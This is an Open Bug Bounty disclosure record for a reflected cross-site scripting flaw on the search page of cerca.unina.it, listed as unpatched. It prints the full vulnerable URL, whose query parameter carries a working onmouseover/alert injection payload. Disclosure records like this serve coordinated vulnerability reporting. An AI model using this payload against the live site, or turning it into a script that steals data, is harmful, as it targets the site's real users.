cerca.unina.it XSS vulnerability

2015-11-05T22:30:00
ID OBB:101978
Type openbugbounty
Reporter P4r4Bellum
Modified 2015-11-05T22:33:00

Description

Vulnerable URL:
http://cerca.unina.it/search?q=%22onmouseover=alert%28/XSSPOSED/%29%20lol=%22&client;=unina2014&output;=xml_no_dtd&proxystylesheet;=unina2014&site;=Unina2014&filter;=0&getfields;=*
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check cerca.unina.it SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 5 November, 2015 22:30 GMT
Vulnerability existence verified and confirmed| 5 November, 2015 22:33 GMT